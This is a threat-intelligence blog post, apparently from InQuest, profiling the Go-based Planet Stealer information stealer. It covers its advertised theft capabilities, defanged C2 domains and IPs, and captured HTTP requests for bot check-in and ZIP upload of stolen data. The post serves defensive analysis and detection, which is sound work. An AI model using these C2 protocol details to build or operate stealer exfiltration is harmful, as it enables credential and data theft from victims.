Recent discussion around an emerging information-stealing trojan project reinforces the continual need to track intelligence on capabilities adversaries rely on for the collection of sensitive information from victims. In today’s blog InQuest analysts share information that has been publicly documented recently about the newer threat named Planet Stealer, recently offered for sale in underground forums.

Planet Stealer

A/K/A

  • PlanetStealer

Overview

Planet is an information stealing (stealer) trojan implemented in Go. The purpose of these types of malware is to collect and exfiltrate sensitive information from victim hosts where the threat actor has gained an initial foothold. Information stealers make up a large portion of the malware-as-a-service (MaaS) ecosystem today (malware offered as a service offering, often with hosted control panels and support from threat actors), making them attractive to many financially motivated adversaries wishing to acquire data from users for later use or sale.

There are many information-stealing malware families on the underground market, indicating demand from criminal communities to find dominant stealers to harvest credentials and data from end users.

References

Actors

One or more active threat actors have utilized Planet in recent campaigns. Reported samples have been distributed as EXE files, with at least one appearing to be distributed as a payload from a loader trojan. An active command & control (C2) server has been noted as common among samples, potentially used by a single threat actor or potentially as core infrastructure by the malware seller.

Capabilities

In forum advertisements, the seller has advertised several capabilities, mostly common among this class of malware.

  • Browser information theft
    • Chromium and Gecko browsers
    • Target data: cookies, session data, credentials
  • Cryptocurrency wallet theft
  • Messenger and game client credential theft
  • T1497 Virtualization/Sandbox Evasion
  • Telegram exfiltration

InQuest has observed that some behavioral sandbox reports have not captured complete analysis results including network communication details from analyzed samples, potentially supporting the functionality of implemented sandbox evasion features. As a newer project in the malware space, it is likely that implemented features are not advanced and future defense evasion measures will become more advanced in this stealer family.

C2

  • Telegram
    • Exfiltration via the Telegram messaging service is advertised. This is a somewhat common data exfiltration technique used by information stealing malware.
  • HTTP (POST)
    • Communication with the C2 server is implemented using an HTTP API with inner JSON data. Analysis of the C2 servers indicates a likely modern Python ASGI-based service using the Uvicorn app server on the backend, coupled with the FastAPI API library.
    • Main endpoints:
    • /submit/info
      • Initial check-in and bot registration
    • /submit/file
      • Data exfiltration (ZIP file upload containing collected data)
  • Observed request header:
    • User-Agent: Go-http-client/1.1
  • Observed response header:
    • Server: uvicorn
  • hXXp://hzp02itt0a[.]com/submit/info
  • hXXp://hzp02itt0a[.]com/submit/error
  • hXXp://193.178.170[.]30/submit/info
  • hXXp://193.178.170[.]30/submit/file
  • 193.178.170.30   AS48282 | RU | VDSINA-AS
    • 193.178.170.0/24 | RU | RU-VDSINA-20191118
      • ORG-HTL17-RIPE | RU | Hosting Technology LTD

Observed C2 request data, initial check-in (h/t ANY.RUN):

POST /submit/info HTTP/1.1
Host: 193.178.170.30
User-Agent: Go-http-client/1.1
Content-Length: 601
Content-Type: application/json
Accept-Encoding: gzip

{"owner_id":"65c2806e786bc1a62d5425d3","bot_id":"GQHQf1zL","build_id":"SEfFEjMJ","statistics":{"total_passwords":1,"total_cookies":25,"total_cards":0,"total_autofills":0,"total_wallets":0,"total_bookmarks":0},"computer":{"username":"admin","hostname":"DESKTOP-JGLLJLD","hwid":"bb926e54-e3ca-40fd-ae90-2764341e7792","cpu":"Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz","gpu":"Microsoft Basic Display Adapter","windows_version":"Windows 10 Pro","country":"DE","ip":"181.214.173.146"},"wallets":null,"credentials":[{"url":"https://google.com","username":"admin","password":"admin"}],"software":null,"file":""}

Formatted JSON data:

{

  "owner_id": "65c2806e786bc1a62d5425d3",
  "bot_id": "GQHQf1zL",
  "build_id": "SEfFEjMJ",
  "statistics": {
    "total_passwords": 1,
    "total_cookies": 25,
    "total_cards": 0,
    "total_autofills": 0,
    "total_wallets": 0,
    "total_bookmarks": 0
  },
  "computer": {
    "username": "admin",
    "hostname": "DESKTOP-JGLLJLD",
    "hwid": "bb926e54-e3ca-40fd-ae90-2764341e7792",
    "cpu": "Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz",
    "gpu": "Microsoft Basic Display Adapter",
    "windows_version": "Windows 10 Pro",
    "country": "DE",
    "ip": "181.214.173.146"
  },
  "wallets": null,
  "credentials": [
    {
      "url": "https://google.com",
      "username": "admin",
      "password": "admin"
    }
  ],
  "software": null,
  "file": ""
}

Response data:

HTTP/1.1 200 OK
date: Sun, 03 Mar 2024 15:02:24 GMT
server: uvicorn
content-length: 66
content-type: application/json
{"success":true,"callback":"cc081a61-1139-4400-934e-adfed816b758"}

Observed C2 request data, ZIP archive for data exfiltration:

POST /submit/file HTTP/1.1
Host: 193.178.170.30
User-Agent: Go-http-client/1.1
Content-Length: 2741
Content-Type: multipart/form-data; boundary=cbe1fe5aa3aa4a494e7fb583fd949208356f9b3354504b7733997d4ddd71
Accept-Encoding: gzip
--cbe1fe5aa3aa4a494e7fb583fd949208356f9b3354504b7733997d4ddd71
Content-Disposition: form-data; name="file"; filename="C:\Users\admin\AppData\Local\Temp\GQHQf1zL-cc081a61-1139-4400-934e-adfed816b758.zip"
Content-Type: application/octet-stream
PK......[redacted]

Response data:

HTTP/1.1 200 OK
date: Sun, 03 Mar 2024 15:02:24 GMT
server: uvicorn
content-length: 16
content-type: application/json
{"success":true}

Samples

Miscellaneous notes

  • The malware is implemented in Go, a modern compiled language
  • Planet Stealer has been distributed using other threats:
  • Advertised on underground forums (advertisements posted 2024-03-03):
    • BreachForums 2
    • Hack Forums
  • Presence on messaging services:

InQuest credits open source intelligence surrounding disclosure of this stealer project to contributors listed in the References section and file sample notes. Thank you!

For in-depth information on another stealer trojan in reporting from InQuest and Zscaler, refer to Mystic Stealer: The New Kid on the Block.

Countermeasures

The use of a network-based instrumentation system that provides NetFlow-like metadata generation as well as DNS protocol capture and instrumentation in conjunction with a platform that can apply near real-time Threat Intelligence against this data serves as a basic control for detection, investigation, and response for malware attacks like Planet stealer.  Additional capabilities can be deployed to focus on interception and instrumentation of HTTP/HTTPS traffic either via web proxy (ICAP) or other means to ensure that your detection domain extends to the protocol level that this threat (and others) leverage for C2.  These three main foundational capabilities of network-based detection can provide any enterprise with a fighting chance against identifying, investigating, and then actioning against threats like these now and in the future. 

InQuest’s NetTAC platform provides these capabilities and more to its users and leverages our own highly validated InQuest InSights threat intelligence feeds, which provide global situational awareness into the threat landscape to stop emerging threats from exploiting your users.  Please visit https://inquest.net/products/nettac/ for more information.